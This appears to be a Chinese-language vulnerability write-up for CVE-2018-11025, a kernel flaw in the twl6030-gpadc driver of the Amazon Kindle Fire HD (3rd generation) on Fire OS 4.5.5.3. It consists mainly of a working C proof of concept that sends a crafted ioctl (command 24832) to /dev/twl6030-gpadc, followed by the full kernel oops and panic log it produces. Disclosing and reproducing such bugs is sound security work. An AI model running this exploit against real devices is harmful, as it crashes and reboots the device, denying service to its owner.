(CVE-2018-11025)Amazon Kindle Fire HD (3rd) Fire OS kernel组件安全漏洞.md
14.66 KB / 2021-07-15 19:45:57
## 一、漏洞简介
Amazon Kindle Fire HD(3rd)Fire OS 4.5.5.3内核组件中的内核模块/omap/drivers/mfd/twl6030-gpadc.c允许攻击者通过设备/ dev / twl6030上的ioctl的参数注入特制的参数-gpadc命令**24832**并导致内核崩溃。
要探索此漏洞,必须打开设备文件/ dev / twl6030-gpadc,并使用命令**24832**和精心设计的有效负载作为第三个参数在此设备文件上调用ioctl系统调用。
## 二、漏洞影响
Fire OS 4.5.5.3
## 三、复现过程
### poc
```
/*
* This is poc of Kindle Fire HD 3rd
* A bug in the ioctl interface of device file /dev/twl6030-gpadc causes
* the system crash via IOCTL 24832.
*
* This Poc should run with permission to do ioctl on /dev/twl6030-gpadc.
*
*/
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>
const static char *driver = "/dev/twl6030-gpadc";
static command = 24832;
struct twl6030_gpadc_user_parms {
int channel;
int status;
unsigned short result;
};
int main(int argc, char **argv, char **env) {
struct twl6030_gpadc_user_parms payload;
payload.channel = 0x9b2a9212;
payload.status = 0x0;
payload.result = 0x0;
int fd = 0;
fd = open(driver, O_RDWR);
if (fd < 0) {
printf("Failed to open %s, with errno %d\n", driver, errno);
system("echo 1 > /data/local/tmp/log");
return -1;
}
printf("Try ioctl device file '%s', with command 0x%x and payload NULL\n", driver, command);
printf("System will crash and reboot.\n");
if(ioctl(fd, command, &payload) < 0) {
printf("Allocation of structs failed, %d\n", errno);
system("echo 2 > /data/local/tmp/log");
return -1;
}
close(fd);
return 0;
}
```
### 崩溃日志
```
[18460.321624] Unable to handle kernel paging request at virtual address 4b3f25fc
[18460.330139] pgd = ca210000
[18460.333251] [4b3f25fc] *pgd=00000000
[18460.337768] Internal error: Oops: 5 [#1] PREEMPT SMP ARM
[18460.343810] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
[18460.351440] CPU: 0 Tainted: G O (3.4.83-gd2afc0bae69 #1)
[18460.358825] PC is at twl6030_gpadc_ioctl+0x160/0x180
[18460.364379] LR is at twl6030_gpadc_conversion+0x5c/0x484
[18460.370452] pc : [<c031b080>] lr : [<c031a950>] psr: 60030013
[18460.370452] sp : de94dd90 ip : 00000000 fp : de94df04
[18460.383422] r10: 00000000 r9 : dcccf608 r8 : bea875ec
[18460.389282] r7 : de94c000 r6 : 00000000 r5 : 00006100 r4 : bea875ec
[18460.396697] r3 : fffffeb4 r2 : 4b3f2730 r1 : de94dee8 r0 : 00000001
[18460.404113] Flags: nZCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment user
[18460.412048] Control: 10c5387d Table: 8a21004a DAC: 00000015
[18460.418609]
[18460.418609] PC: 0xc031b000:
[18460.423583] b000 e24b101c e30f3eb4 e34f3fff e0822082 e0812102 e51220e4 e18120b3 e5973008
[18460.434234] b020 e294200c 30d22003 33a03000 e3530000 0a000006 e3e0000c e24bd01c e89da8f0
[18460.444885] b040 e24b0e17 e3a0100c ebfcf5c4 eafffff8 e1a00004 e24b1e17 e3a0200c ebfced7f
[18460.455444] b060 e3500000 0afffff3 eafffff1 e51b2170 e24b101c e30f3eb4 e34f3fff e0812102
[18460.465972] b080 e5122134 e18120b3 eaffffe3 03e0303c 150b016c 050b316c eaffffdf c0acabbc
[18460.476623] b0a0 e1a0c00d e92dd800 e24cb004 e59030e0 e3530000 159000ec 03e00012 e89da800
[18460.487182] b0c0 e1a0c00d e92dd800 e24cb004 e59000f0 e89da800 e1a0c00d e92dd800 e24cb004
[18460.497863] b0e0 e5d020e9 e5d030e8 e1820003 e2000003 e89da800 e1a0c00d e92dd800 e24cb004
[18460.508544]
[18460.508544] LR: 0xc031a8d0:
[18460.513519] a8d0 e89da878 e1a00004 ebffff20 e2000003 e3500002 13e0000a 03a00000 e89da878
[18460.524078] a8f0 c09ba0c0 e1a0c00d e92ddff0 e24cb004 e24dd014 e2509000 0a000114 e59f5454
[18460.534759] a910 e595008c e3500000 0a00010b e2800004 eb0e1ff0 e1d910b6 e3510001 9a00000a
[18460.545318] a930 e595308c e3e06015 e59f142c e5930000 ebff4e6b e595a08c e28a0004 eb0e1f69
[18460.555999] a950 e1a00006 e24bd028 e89daff0 e595a08c e3a03f52 e023a193 e5933038 e3530000
[18460.566680] a970 13e0600f 1afffff3 e59a32c4 e0818101 e595c088 e3130010 e08c7008 1a000025
[18460.577331] a990 e3510000 0a0000c4 e1d930b8 e3530001 0a0000d7 e1d940b6 e3540000 0a0000bc
[18460.587890] a9b0 e3a0000e e3a01002 e3a02090 e5956088 ebfff8bc e3540001 0a0000d1 e1d920b6
[18460.598571]
[18460.598571] SP: 0xde94dd10:
[18460.603546] dd10 00000000 0000000d de94dda0 10624dd3 de94dd4c c031b080 60030013 ffffffff
[18460.614196] dd30 de94dd7c bea875ec de94df04 de94dd48 c06a5318 c0008370 00000001 de94dee8
[18460.624877] dd50 4b3f2730 fffffeb4 bea875ec 00006100 00000000 de94c000 bea875ec dcccf608
[18460.635528] dd70 00000000 de94df04 00000000 de94dd90 c031a950 c031b080 60030013 ffffffff
[18460.646087] dd90 de94ddac 9b2a9212 00000000 00000000 00040000 0001f8fc 00000000 00000000
[18460.656738] ddb0 c00795a0 00000001 de94ddd4 de94ddc8 c00795b4 c00792bc de94de0c de94ddd8
[18460.667419] ddd0 c0070df8 c00795ac de94c000 00000001 00000004 dd32f8f4 60000013 00000001
[18460.678100] ddf0 00000001 00000004 dd32f800 00000000 00000000 de94de10 c00723a0 c06a4818
[18460.688629]
[18460.688659] FP: 0xde94de84:
[18460.693725] de84 de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0
[18460.704284] dea4 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000
[18460.714935] dec4 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000
[18460.725616] dee4 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044
[18460.736328] df04 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8
[18460.746856] df24 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.757537] df44 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000
[18460.768096] df64 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000 00000400
[18460.778625]
[18460.778625] R1: 0xde94de68:
[18460.783721] de68 c2572140 de94debc 00000001 00000028 000fffff 00000001 de94dedc de94de90
[18460.794403] de88 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8 c00723a0 000fffff
[18460.804962] dea8 00000000 ffffffff 00000002 00000001 00000000 de94df14 00000000 00000001
[18460.815643] dec8 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000 00000000 00000000
[18460.826202] dee8 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08 c0136044 c031af2c
[18460.836730] df08 00000000 00000000 00000000 00000001 00000000 dd188490 d8f925d8 de94df0c
[18460.847381] df28 de94c000 bea87618 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.858032] df48 de94df64 00000000 bea875ec 00006100 d683fb40 00000004 de94c000 00000000
[18460.868713]
[18460.868713] R3: 0xfffffe34:
[18460.873687] fe34 ******** ******** ******** ******** ******** ******** ******** ********
[18460.884246] fe54 ******** ******** ******** ******** ******** ******** ******** ********
[18460.894805] fe74 ******** ******** ******** ******** ******** ******** ******** ********
[18460.905456] fe94 ******** ******** ******** ******** ******** ******** ******** ********
[18460.916137] feb4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.926788] fed4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.937347] fef4 ******** ******** ******** ******** ******** ******** ******** ********
[18460.948028] ff14 ******** ******** ******** ******** ******** ******** ******** ********
[18460.958709]
[18460.958709] R7: 0xde94bf80:
[18460.963684] bf80 de926680 c00635cc 00000013 de84190c de926680 c00635cc 00000013 00000000
[18460.974365] bfa0 00000000 00000000 de94bff4 de94bfb8 c0068af4 c00635d8 00000000 00000000
[18460.985015] bfc0 de926680 00000000 00000000 00000000 de94bfd0 de94bfd0 00000000 de84190c
[18460.995574] bfe0 c0068a64 c004cd64 00000000 de94bff8 c004cd64 c0068a70 1d04e2fb 1dfbe204
[18461.006225] c000 00000000 00000002 00000000 c2572140 c0a0e840 00000000 00000015 cf9fca80
[18461.016906] c020 00000000 de94c000 c09ddc50 c2572140 c25717c0 c1617b40 de94da7c de94d9c8
[18461.027587] c040 c06a36e4 00000000 00000000 00000000 00000000 00000000 01000000 00000000
[18461.038146] c060 00c5f4c0 5ebcc27f 00000000 00000000 00000000 00000000 00000000 00000000
[18461.048828]
[18461.048828] R9: 0xdcccf588:
[18461.053802] f588 dcccf588 dcccf588 00000000 00000000 00000000 c06bc674 000200da c09dda58
[18461.064483] f5a8 00000000 00000000 dcccf5b0 dcccf5b0 00000000 dcccf5bc dcccf5bc 00000000
[18461.075134] f5c8 5ae3ed25 00000000 00000000 00000000 dcccf5e0 00000000 00000000 00000000
[18461.085815] f5e8 00200000 00000000 00000000 dcccf5f4 dcccf5f4 dccb2440 dccb2440 00000000
[18461.096343] f608 00052180 00000000 00000000 00000000 00000000 00000000 c06b9600 dd1a4800
[18461.107025] f628 dcccf6e0 dccb0300 00000c45 00000001 00a0003b 5ae3ed25 2bc5ac58 5ae3ed25
[18461.117675] f648 2bc5ac58 5ae3ed25 2bc5ac58 00000000 00000000 00000000 00000000 00000000
[18461.128234] f668 00000000 00000000 00000000 00000000 00000001 00000000 00000000 dcccf684
[18461.138885] Process twl6030_gpadc_i (pid: 12849, stack limit = 0xde94c2f8)
[18461.146697] Stack: (0xde94dd90 to 0xde94e000)
[18461.151611] dd80: de94ddac 9b2a9212 00000000 00000000
[18461.160827] dda0: 00040000 0001f8fc 00000000 00000000 c00795a0 00000001 de94ddd4 de94ddc8
[18461.170043] ddc0: c00795b4 c00792bc de94de0c de94ddd8 c0070df8 c00795ac de94c000 00000001
[18461.179138] dde0: 00000004 dd32f8f4 60000013 00000001 00000001 00000004 dd32f800 00000000
[18461.188354] de00: 00000000 de94de10 c00723a0 c06a4818 00000004 00000001 dd32e0d8 dd32f800
[18461.197570] de20: dd32e000 0000000a de94c000 c26fda80 de94de54 de94de40 c02ba53c c0072360
[18461.206787] de40: dd32f800 dd32e000 de94de74 de94de58 c02c3c88 c02ba518 dd32e000 00000002
[18461.215881] de60: 00000002 dd32fbbc c2572140 de94debc 00000001 00000028 000fffff 00000001
[18461.225097] de80: de94dedc de94de90 c0207454 c00bd920 0000001e c26fda80 de94ded4 de94dea8
[18461.234313] dea0: c00723a0 000fffff 00000000 ffffffff 00000002 00000001 00000000 de94df14
[18461.243408] dec0: 00000000 00000001 dcccf608 cfa9bf00 de94defc de94dee0 c02089fc 00000000
[18461.252624] dee0: 00000000 00000000 00000000 d683fb40 00000004 d683fb40 de94df74 de94df08
[18461.261840] df00: c0136044 c031af2c 00000000 00000000 00000000 00000001 00000000 dd188490
[18461.271057] df20: d8f925d8 de94df0c de94c000 bea87618 bea875ec 00006100 d683fb40 00000004
[18461.280151] df40: de94c000 00000000 de94df64 00000000 bea875ec 00006100 d683fb40 00000004
[18461.289367] df60: de94c000 00000000 de94dfa4 de94df78 c01365e0 c0135fc4 00000000 00000000
[18461.298583] df80: 00000400 bea87618 00010e5c 00000000 00000036 c0013e08 00000000 de94dfa8
[18461.307800] dfa0: c0013c60 c0136578 bea87618 00010e5c 00000004 00006100 bea875ec bea875ec
[18461.316894] dfc0: bea87618 00010e5c 00000000 00000036 00000000 00000000 00000000 bea87604
[18461.326110] dfe0: 00000000 bea875d4 00010698 0002918c 60000010 00000004 00000000 00000000
[18461.335296] Backtrace:
[18461.338317] [<c031af20>] (twl6030_gpadc_ioctl+0x0/0x180) from [<c0136044>] (do_vfs_ioctl+0x8c/0x5b4)
[18461.348571] r7:d683fb40 r6:00000004 r5:d683fb40 r4:00000000
[18461.355560] [<c0135fb8>] (do_vfs_ioctl+0x0/0x5b4) from [<c01365e0>] (sys_ioctl+0x74/0x84)
[18461.364807] [<c013656c>] (sys_ioctl+0x0/0x84) from [<c0013c60>] (ret_fast_syscall+0x0/0x30)
[18461.374206] r8:c0013e08 r7:00000036 r6:00000000 r5:00010e5c r4:bea87618
[18461.382507] Code: e24b101c e30f3eb4 e34f3fff e0812102 (e5122134)
[18461.401061] Board Information:
[18461.401061] Revision : 0001
[18461.401092] Serial : 0000000000000000
[18461.401092] SoC Information:
[18461.401092] CPU : OMAP4470
[18461.401122] Rev : ES1.0
[18461.401122] Type : HS
[18461.401122] Production ID: 0002B975-000000CC
[18461.401122] Die ID : 1CC60000-50002FFF-0B00935D-11007004
[18461.401153]
[18461.406127] audit_printk_skb: 111 callbacks suppressed
[18461.406127] type=1400 audit(1525657115.783:1097): avc: denied { getattr } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406280] type=1400 audit(1525657115.783:1098): avc: denied { execute } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406524] type=1400 audit(1525657115.783:1099): avc: denied { read open } for pid=12851 comm="am" name="app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.406768] type=1400 audit(1525657115.783:1100): avc: denied { execute_no_trans } for pid=12851 comm="am" path="/system/bin/app_process" dev="mmcblk0p9" ino=32006 scontext=u:r:untrusted_app:s0 tcontext=u:object_r:zygote_exec:s0 tclass=file
[18461.534057] ---[ end trace f98f4a7b98572f61 ]---
[18461.540374] Kernel panic - not syncing: Fatal exception
[18461.546173] CPU1: stopping
[18461.549285] Backtrace:
[18461.552459] [<c0018148>] (dump_backtrace+0x0/0x10c) from [<c0698bb8>] (dump_stack+0x18/0x1c)
[18461.561828] r6:c09ddc50 r5:c09dc844 r4:00000001 r3:c0a0e950
[18461.568969] [<c0698ba0>] (dump_stack+0x0/0x1c) from [<c0019bd8>] (handle_IPI+0x190/0x1c4)
[18461.578185] [<c0019a48>] (handle_IPI+0x0/0x1c4) from [<c00084fc>] (gic_handle_irq+0x58/0x60)
[18461.587554] [<c00084a4>] (gic_handle_irq+0x0/0x60) from [<c06a5540>] (__irq_usr+0x40/0x60)
[18461.596862] Exception stack(0xc8967fb0 to 0xc8967ff8)
[18461.602691] 7fa0: 404143ed 4041294b 00000054 000012f0
[18461.611755] 7fc0: 4028cdb4 4040e438 0000012f 4041294b 4040d148 404111d8 beb9c2e0 404275c0
[18461.620971] 7fe0: 40416bef beb9c1f0 4009d01f 400a0ec0 000f0010 ffffffff
[18461.628478] r6:ffffffff r5:000f0010 r4:400a0ec0 r3:404143ed
[18461.635559] CPU0 PC (0) : 0xc003ee38
[18461.639617] CPU0 PC (1) : 0xc003ee54
[18461.643798] CPU0 PC (2) : 0xc003ee54
[18461.647857] CPU0 PC (3) : 0xc003ee54
[18461.651916] CPU0 PC (4) : 0xc003ee54
[18461.656097] CPU0 PC (5) : 0xc003ee54
[18461.660156] CPU0 PC (6) : 0xc003ee54
[18461.664215] CPU0 PC (7) : 0xc003ee54
[18461.668395] CPU0 PC (8) : 0xc003ee54
[18461.672454] CPU0 PC (9) : 0xc003ee54
[18461.676513] CPU1 PC (0) : 0xc0019b2c
[18461.680694] CPU1 PC (1) : 0xc0019b2c
[18461.684753] CPU1 PC (2) : 0xc0019b2c
[18461.688812] CPU1 PC (3) : 0xc0019b2c
[18461.692871] CPU1 PC (4) : 0xc0019b2c
[18461.697051] CPU1 PC (5) : 0xc0019b2c
[18461.701110] CPU1 PC (6) : 0xc0019b2c
[18461.705169] CPU1 PC (7) : 0xc0019b2c
[18461.709381] CPU1 PC (8) : 0xc0019b2c
[18461.713409] CPU1 PC (9) : 0xc0019b2c
[18461.717498]
[18461.719268] Restarting Linux version 3.4.83-gd2afc0bae69 (build@14-use1a-b-39) (gcc version 4.7 (GCC) ) #1 SMP PREEMPT Tue Sep 19 22:04:47 UTC 2017
[18461.719299]
```